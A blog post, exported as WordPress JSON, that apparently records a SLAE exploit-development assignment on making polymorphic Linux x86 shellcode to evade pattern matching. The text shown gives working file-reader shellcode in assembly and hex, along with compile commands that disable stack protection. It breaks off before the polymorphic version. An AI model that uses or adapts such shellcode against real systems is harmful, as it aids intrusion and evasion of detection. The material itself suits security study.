{"id":840,"date":"2020-09-17T19:03:52","date_gmt":"2020-09-17T19:03:52","guid":{"rendered":"http:\/\/mosunit.com\/?p=840"},"modified":"2020-09-17T19:03:54","modified_gmt":"2020-09-17T19:03:54","slug":"crafting-linux-x86-polymorphic-shellcodes","status":"publish","type":"post","link":"https:\/\/mosunit.com\/?p=840","title":{"rendered":"Crafting Linux x86 Polymorphic Shellcodes"},"content":{"rendered":"\n

In this post, I am going to refer 3 Linux x86 shellcodes from shell-storm<\/a> database and create their polymorphic versions. To elaborate, I will try to achieve polymorphism by using semantically equivalent instructions to achieve the original functionality, but trying to evade the pattern matching.<\/p>\n\n\n\n

I will keep this post short and crisp. So, let’s jump right into it:<\/p>\n\n\n\n

Linux\/x86 File Reader<\/h2>\n\n\n\n

The first one that I chose is a file reader<\/a> shellcode. The shellcode had hard-coded string value, which is the file pathname. Upon execution, the shellcode invokes open, read and write syscall to read the file mentioned by the pathname string. The original shellcode is as follows (converted to Intel format):<\/p>\n\n\n\n

global _start\n\n_start:\n        xor eax, eax\n        xor ebx, ebx\n        xor ecx, ecx\n        xor edx, edx\n        jmp two\n\none:\n        pop ebx\n\n        mov al, 0x5\n        xor ecx, ecx\n        int 0x80\n\n        mov esi, eax\n        jmp read\n\nexit:\n        mov al, 0x1\n        xor ebx, ebx\n        int 0x80\n\nread:\n        mov ebx, esi\n        mov al, 0x3\n        sub esp, 1\n        lea ecx,[esp]\n        mov dl,0x1\n        int 0x80\n\n        xor ebx, ebx\n        cmp ebx, eax\n        je exit\n\n        mov al, 0x4\n        mov bl, 0x1\n        mov dl, 0x1\n        int 0x80\n\n        add esp, 1\n        jmp read\n\ntwo:\n        call one\n        db \"file_name\"<\/pre>\n\n\n\n
I changed the string file_name <\/em>to “\/etc\/netconfig”<\/em>, compiled and ran the code and got the following output.<\/p>\n\n\n\n
root@kali:~\/slae\/assignments\/assignment-6# objdump -d file_reader |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\\t' ' '|sed 's\/ $\/\/g'|sed 's\/ \/\\\\x\/g'|paste -d '' -s |sed 's\/^\/\"\/'|sed 's\/$\/\"\/g'\n\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\xeb\\x32\\x5b\\xb0\\x05\\x31\\xc9\\xcd\\x80\\x89\\xc6\\xeb\\x06\\xb0\\x01\\x31\\xdb\\xcd\\x80\\x89\\xf3\\xb0\\x03\\x83\\xec\\x01\\x8d\\x0c\\x24\\xb2\\x01\\xcd\\x80\\x31\\xdb\\x39\\xc3\\x74\\xe6\\xb0\\x04\\xb3\\x01\\xb2\\x01\\xcd\\x80\\x83\\xc4\\x01\\xeb\\xdf\\xe8\\xc9\\xff\\xff\\xff\\x2f\\x65\\x74\\x63\\x2f\\x6e\\x65\\x74\\x63\\x6f\\x6e\\x66\\x69\\x67\"\nroot@kali:~\/slae\/assignments\/assignment-6# nano shellcode.c\nroot@kali:~\/slae\/assignments\/assignment-6# gcc -fno-stack-protector -z execstack shellcode.c -o file_reader_original\nshellcode.c:7:1: warning: return type defaults to \u2018int\u2019 [-Wimplicit-int]\n    7 | main()\n      | ^~~~\nroot@kali:~\/slae\/assignments\/assignment-6# .\/file_reader_original\nShellcode length: 79\n#\n# The network configuration file. This file is currently only used in\n# conjunction with the TI-RPC code in the libtirpc library.\n#\n# Entries consist of:\n#\n#       <network_id> <semantics> <flags> <protofamily> <protoname> \\\n#               <device> <nametoaddr_libs>\n#\n# The <device> and <nametoaddr_libs> fields are always empty in this\n# implementation.\n#\nudp        tpi_clts      v     inet     udp     -       -\ntcp        tpi_cots_ord  v     inet     tcp     -       -\nudp6       tpi_clts      v     inet6    udp     -       -\ntcp6       tpi_cots_ord  v     inet6    tcp     -       -\nrawip      tpi_raw       -     inet      -      -       -\nlocal      tpi_cots_ord  -     loopback  -      -       -\nunix       tpi_cots_ord  -     loopback  -      -       -\n<\/pre>\n\n\n\n
The original shellcode length is 79. <\/p>\n\n\n\n
Post analyzing the code, I created a polymorphic version. Here are the major changes done in the code:
 <\/p>\n\n\n\n